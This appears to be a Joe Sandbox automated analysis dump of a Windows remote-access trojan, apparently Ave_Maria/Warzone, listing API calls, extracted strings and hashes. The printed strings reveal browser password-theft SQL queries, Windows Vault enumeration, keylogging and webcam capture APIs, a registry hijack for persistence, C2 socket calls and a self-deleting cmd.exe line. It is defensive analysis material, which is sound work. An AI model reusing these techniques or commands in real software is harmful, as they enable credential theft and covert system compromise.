                                                • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                                • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                                APIs
                                                  • Part of subcall function 00410F31: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 00410F38
                                                • TerminateThread.KERNEL32(00000000,?,?), ref: 00411740
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004117AD
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00411837
                                                • CloseHandle.KERNEL32(?), ref: 00411846
                                                • CloseHandle.KERNEL32(?), ref: 0041184B
                                                • ExitProcess.KERNEL32 ref: 0041184E
                                                Strings
                                                • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 004117BB
                                                Similarity
                                                • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                                • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                                APIs
                                                • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040B561
                                                  • Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2
                                                Similarity
                                                • API ID: LibraryLoadlstrcmp
                                                • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32 ref: 004119E9
                                                • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00411A06
                                                • lstrlenW.KERNEL32(0054CBF0,?,?,?,?,00411A78,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A12
                                                • RegSetValueExW.ADVAPI32 ref: 00411A28
                                                • RegCloseKey.ADVAPI32(?), ref: 00411A31
                                                Similarity
                                                • API ID: CloseCreateOpenValuelstrlen
                                                • String ID: Install$SOFTWARE\_rptls
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,0054CBF0,00000208,00000000,00000000,?,?,?,004057B9,?,00000000,00000000), ref: 00411A58
                                                • IsUserAnAdmin.SHELL32 ref: 00411A5E
                                                  • Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,770113FB,00000000,770113FB,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
                                                  • Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
                                                  • Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
                                                  • Part of subcall function 0040FBFC: CloseHandle.KERNEL32(00000000), ref: 0040FC48
                                                  • Part of subcall function 004119C9: RegOpenKeyExW.ADVAPI32 ref: 004119E9
                                                  • Part of subcall function 004119C9: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00411A06
                                                  • Part of subcall function 004119C9: lstrlenW.KERNEL32(0054CBF0,?,?,?,?,00411A78,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A12
                                                  • Part of subcall function 004119C9: RegSetValueExW.ADVAPI32 ref: 00411A28
                                                  • Part of subcall function 004119C9: RegCloseKey.ADVAPI32(?), ref: 00411A31
                                                • FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A87
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A91
                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A9B
                                                • LockResource.KERNEL32(00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00411AA2
                                                  • Part of subcall function 00411936: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000), ref: 00411974
                                                  • Part of subcall function 00411936: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411988
                                                  • Part of subcall function 00411936: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411996
                                                  • Part of subcall function 00411936: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 004119A4
                                                Similarity
                                                • API ID: Resource$CloseOpenProcessTokenVirtuallstrlen$AdminAllocCreateCurrentDirectoryFileFindHandleInformationLoadLockModuleNameProtectSizeofUserValueWindows
                                                • String ID: WM_DSP
                                                APIs
                                                • lstrlenA.KERNEL32(00411B3D,00416056,?,?,00411B3D,00416056,?), ref: 0041185D
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?), ref: 0041187A
                                                • SetLastError.KERNEL32(00000000,?,?,00411B3D,00416056,?), ref: 00411885
                                                • RegSetValueExA.ADVAPI32(?,V`A,00000000,00000001,00411B3D,00000000), ref: 0041189D
                                                • RegCloseKey.ADVAPI32(?), ref: 004118A8
                                                Similarity
                                                • API ID: CloseErrorLastOpenValuelstrlen
                                                • String ID: Software\Classes\Folder\shell\open\command$V`A
                                                APIs
                                                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405CAB
                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,?,?,?,?,?,?,?,00405A5F,?,00000000,h\HA), ref: 00405CB7
                                                • ExitProcess.KERNEL32 ref: 00405CDB
                                                Similarity
                                                • API ID: AddressExitLibraryLoadProcProcess
                                                • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                                APIs
                                                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405F6F
                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405F7B
                                                • ExitProcess.KERNEL32 ref: 00405F9A
                                                Strings
                                                • USER32.DLL, xrefs: 00405F6A
                                                • MessageBoxA, xrefs: 00405F75
                                                • PureCall, xrefs: 00405F8A
                                                • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 00405F8F
                                                Similarity
                                                • API ID: AddressExitLibraryLoadProcProcess
                                                • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410D6A
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00410D83
                                                • CloseHandle.KERNEL32(00000000), ref: 00410D8E
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 00410DF8
                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00410E2E
                                                • CloseHandle.KERNEL32(00000000), ref: 00410E81
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00410EE5
                                                • CloseHandle.KERNEL32(00000000), ref: 00410EF7
                                                Similarity
                                                • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                                • String ID:
                                                Similarity
                                                • API ID: recv
                                                • String ID: <5Ik
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00412D1A
                                                • CoCreateInstance.OLE32(004145A0,00000000,00000001,00417410,?), ref: 00412D32
                                                • CoCreateInstance.OLE32(004145F0,00000000,00000001,00417400,?), ref: 00412D8C
                                                  • Part of subcall function 00412A6B: CoCreateInstance.OLE32(004145E0,00000000,00000001,004173F0,?), ref: 00412A99
                                                Similarity
                                                • API ID: CreateInstance$Initialize
                                                • String ID: Grabber$Source$vids
                                                APIs
                                                  • Part of subcall function 0040F80E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F825
                                                  • Part of subcall function 0040F80E: CoInitialize.OLE32(00000000), ref: 0040F82C
                                                  • Part of subcall function 0040F80E: CoCreateInstance.OLE32(00414490,00000000,00000017,00416E60,?), ref: 0040F84A
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D1B
                                                  • Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00411E4E
                                                  • Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
                                                  • Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411E72
                                                  • Part of subcall function 00411E21: CloseHandle.KERNEL32(00000000), ref: 00411E7F
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 0040FA1F: GlobalMemoryStatusEx.KERNEL32(?), ref: 0040FA30
                                                  • Part of subcall function 0040FC7E: GetComputerNameW.KERNEL32(00402D7F,00000010), ref: 0040FCA1
                                                  • Part of subcall function 0040FC58: GetCurrentProcess.KERNEL32(?,?,00402D84,?,00414648,?,?,00000000,?,?,?), ref: 0040FC5C
                                                  • Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,770113FB,00000000,770113FB,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
                                                  • Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
                                                  • Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
                                                  • Part of subcall function 0040FBFC: CloseHandle.KERNEL32(00000000), ref: 0040FC48
                                                  • Part of subcall function 0040FA42: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040FA5A
                                                  • Part of subcall function 0040FA42: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040FA6A
                                                  • Part of subcall function 0040FCB8: RegOpenKeyExW.ADVAPI32 ref: 0040FCFC
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00402DDF
                                                • lstrcatW.KERNEL32(?,\Microsoft Vision\,?,?), ref: 00402DF1
                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402DFF
                                                  • Part of subcall function 0040990A: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409916
                                                  • Part of subcall function 0040990A: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 0040992D
                                                  • Part of subcall function 0040990A: EnterCriticalSection.KERNEL32(0054DB10,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409939
                                                  • Part of subcall function 0040990A: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409949
                                                  • Part of subcall function 0040990A: LeaveCriticalSection.KERNEL32(0054DB10,?,00000000), ref: 0040999C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                                • String ID: E%@$\Microsoft Vision\
                                                • API String ID: 1987359387-3463944462
                                                • Opcode ID: 0bb32fca0e1cec9c810d30c46f0d28e8f140ea334447f87a062002849f56b118
                                                • Instruction ID: b073199de962c33f14e286e13f1a431593480788bd2903fd1a4d69c6a0139752
                                                • Opcode Fuzzy Hash: 0bb32fca0e1cec9c810d30c46f0d28e8f140ea334447f87a062002849f56b118
                                                • Instruction Fuzzy Hash: F531A5B1A001187BDB14FBA1DC46DEF7B7CAF84308F00447EB505B25D1DA786B858BA8
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0040EEB4
                                                • gethostbyname.WS2_32(?), ref: 0040EEBD
                                                • htons.WS2_32(?), ref: 0040EEE1
                                                • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 0040EF12
                                                • connect.WS2_32(00000000,?,00000010), ref: 0040EF2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InetNtopconnectgethostbynamehtonssocket
                                                • String ID: <5Ik
                                                • API String ID: 2393792429-1120072674
                                                • Opcode ID: cdb34d5c5418b94e03a5ce5b980ec685bf23eacec3b5f4675f66b9c6347cb78a
                                                • Instruction ID: 731c1f41b349be9d14ca138489269ada96d1ed04eb47d8ef03f8d9d6417251f1
                                                • Opcode Fuzzy Hash: cdb34d5c5418b94e03a5ce5b980ec685bf23eacec3b5f4675f66b9c6347cb78a
                                                • Instruction Fuzzy Hash: BC1122B2900258BFE71097A4AC0AFFB3BACEF45720F00847AF955D71D1D6B48D4487A4
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 0040796B
                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407979
                                                • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407987
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004079C1
                                                • Sleep.KERNEL32(000003E8), ref: 004079D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                                • String ID: \System32\cmd.exe
                                                • API String ID: 2560724043-2003734499
                                                • Opcode ID: a57bf896a3336705eb9b682125765ae6f9619cb330a9343a21c2e3882dae45c2
                                                • Instruction ID: 58d9c2cc0fac3df26a084fe9f643917a57aa3547e5bb2355e88c07080238d8f7
                                                • Opcode Fuzzy Hash: a57bf896a3336705eb9b682125765ae6f9619cb330a9343a21c2e3882dae45c2
                                                • Instruction Fuzzy Hash: 701130F1A00208BBE711A7B5DC86FEF766CAB44748F100036F701B6191DA749E04866A
                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409916
                                                • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 0040992D
                                                • EnterCriticalSection.KERNEL32(0054DB10,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409939
                                                • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409949
                                                • LeaveCriticalSection.KERNEL32(0054DB10,?,00000000), ref: 0040999C
                                                  • Part of subcall function 00401F4B: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401F60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                                • String ID: .@
                                                • API String ID: 2964645253-2319581949
                                                • Opcode ID: 8046fc8c73f33d8b847f44aa86fe7b112ca24563832baac2ee284265c6a58787
                                                • Instruction ID: ece506f6ce73bbe589a0b7a088f437cf03b5d3714308d2ac1236f01bd29d78b7
                                                • Opcode Fuzzy Hash: 8046fc8c73f33d8b847f44aa86fe7b112ca24563832baac2ee284265c6a58787
                                                • Instruction Fuzzy Hash: 51019275A00104ABCB10AB619C5DBDF3FB8E792328F01803AF50567291DB798485CBB4
                                                APIs
                                                • InitializeCriticalSection.KERNEL32(0054DB10,?,00401221), ref: 004099D3
                                                • LoadLibraryW.KERNEL32(User32.dll,?,00401221), ref: 004099FE
                                                  • Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                                • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                                • API String ID: 4274177235-2474467583
                                                • Opcode ID: 70ba2c87c43956a8113042fecd34b8cd119bb0cfa2f61229f0dfcf48f947fb65
                                                • Instruction ID: d3de00d1aaf43c769e47584a328517c6764db5a5fe2dfc5d57fcb1e04d2cd97e
                                                • Opcode Fuzzy Hash: 70ba2c87c43956a8113042fecd34b8cd119bb0cfa2f61229f0dfcf48f947fb65
                                                • Instruction Fuzzy Hash: C7014FB9B506208B8305AF66B8141C93AB5EB99B58713813FF40497261EB7809C5AFAC
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,004086D6,00000000), ref: 00407CD3
                                                • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError,?,004086D6,00000000), ref: 00407CE1
                                                • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error,?,004086D6,00000000), ref: 00407CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                • API String ID: 667068680-2897241497
                                                • Opcode ID: ca2f48d9d945e85a8ca547694f7e163dfc737f3cbe43738b7c5093b57363dbe7
                                                • Instruction ID: aaa8e0cf8f8ab446e772eb97fece59f95b58d6c8f0af5f7a7dbdea8d920d86da
                                                • Opcode Fuzzy Hash: ca2f48d9d945e85a8ca547694f7e163dfc737f3cbe43738b7c5093b57363dbe7
                                                • Instruction Fuzzy Hash: 0BF030786052019BDB145FB5AC0AAB73BB8BED5B45310443AF81DD33A0D77498459A29
                                                APIs
                                                  • Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,770113FB,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151
                                                  • Part of subcall function 0041026F: WaitForSingleObject.KERNEL32(?,000000FF,00405824,770113FB,?,?,00000000,00404EA0,?,?,?,?,?,00000000,770113FB), ref: 00410273
                                                • getaddrinfo.WS2_32(770113FB,00000000,00404EA0,00000000), ref: 00405848
                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040585F
                                                • htons.WS2_32(00000000), ref: 00405885
                                                • freeaddrinfo.WS2_32(00000000), ref: 00405895
                                                • connect.WS2_32(?,?,00000010), ref: 004058A1
                                                • ReleaseMutex.KERNEL32(?), ref: 004058CB
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                                • String ID:
                                                • API String ID: 2516106447-0
                                                • Opcode ID: 9c1a482bcd5bf69540202eb33f3d72a39c7a596b10995cfaab2cecbcb9b1a230
                                                • Instruction ID: 092a2e84de4c1a6289be47cc7bce06a374af0b8a9768fb0cb1c663c0770c8cb0
                                                • Opcode Fuzzy Hash: 9c1a482bcd5bf69540202eb33f3d72a39c7a596b10995cfaab2cecbcb9b1a230
                                                • Instruction Fuzzy Hash: 77215C72A00208ABDF109F61D889BDABBB9FF84320F108066FD15EB291D7759A45CB64
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040CBDC
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0040CBF2
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040CC0D
                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040CC25
                                                • CloseHandle.KERNEL32(00000000), ref: 0040CC48
                                                  • Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
                                                  • Part of subcall function 0040CC54: LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
                                                  • Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
                                                  • Part of subcall function 0040CC54: LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                                • String ID:
                                                • API String ID: 4225742195-0
                                                • Opcode ID: 9d4b79665f6409aa914b77d2342f484c62a30efc57680bae1199c67c8088053d
                                                • Instruction ID: 745445a8a1a410ce86548f79becf7b71122546dbf84d59e0bf673223a6bc5152
                                                • Opcode Fuzzy Hash: 9d4b79665f6409aa914b77d2342f484c62a30efc57680bae1199c67c8088053d
                                                • Instruction Fuzzy Hash: 9F11C371600114FBEB259BA9DCC4EAFBBB8EF45750B00827AF909E6294D7349D41CB98
                                                APIs
                                                • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 00405666
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,770113FB,?,00405A4F,h\HA,00000000), ref: 004033C8
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
                                                  • Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 004056B6
                                                • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405726
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                                • String ID: `$warzone160
                                                • API String ID: 3973575906-811885577
                                                • Opcode ID: 710b13efe40a603839c9b2b6d797050bdf6ef0168bf0519c6c761d0257aa3e9a
                                                • Instruction ID: 13b9312c21fac82d743b2aac4943a07556a81bf37369194c12953ac8d4d921d3
                                                • Opcode Fuzzy Hash: 710b13efe40a603839c9b2b6d797050bdf6ef0168bf0519c6c761d0257aa3e9a
                                                • Instruction Fuzzy Hash: 35514B71901119AACB15EF62CC86CEFBB7CEF44354F10417AF416B71D1EA785A44CAA8
                                                APIs
                                                  • Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2
                                                • MessageBoxA.USER32 ref: 00410B70
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00410BD9: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410C14
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                • VirtualQuery, xrefs: 00410B37
                                                • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 00410BAE
                                                • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 00410B7E
                                                • Bla2, xrefs: 00410B67, 00410B6D, 00410B6E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                                • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                                • API String ID: 1196126833-2308542105
                                                • Opcode ID: 59639a4b70987e4e968c6b63bff16cb3f086a3038b09aaa77ad0ffa956b70a53
                                                • Instruction ID: 4ba3c5a06052b2c8142ea2b85e7c1df050322749d38e1d50acf48aea32407323
                                                • Opcode Fuzzy Hash: 59639a4b70987e4e968c6b63bff16cb3f086a3038b09aaa77ad0ffa956b70a53
                                                • Instruction Fuzzy Hash: 48111271904118BADB08EBA1DD56CEFBB7CDE44718B10016FB402B2181DB78AF84C668
                                                APIs
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000), ref: 00411974
                                                • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411988
                                                • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411996
                                                • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 004119A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HeapVirtual$AllocAllocateDirectoryProcessProtectWindowslstrlen
                                                • String ID: \System32\cmd.exe
                                                • API String ID: 2244922440-2003734499
                                                • Opcode ID: b35bf8d72498e572ccce794c73ad00c33004e6f459524028fc2f66513e749da9
                                                • Instruction ID: a76fe1fb72b9dcd2ba7f7b2c9fe6201737636b2b93b56a950f172e3949bf7431
                                                • Opcode Fuzzy Hash: b35bf8d72498e572ccce794c73ad00c33004e6f459524028fc2f66513e749da9
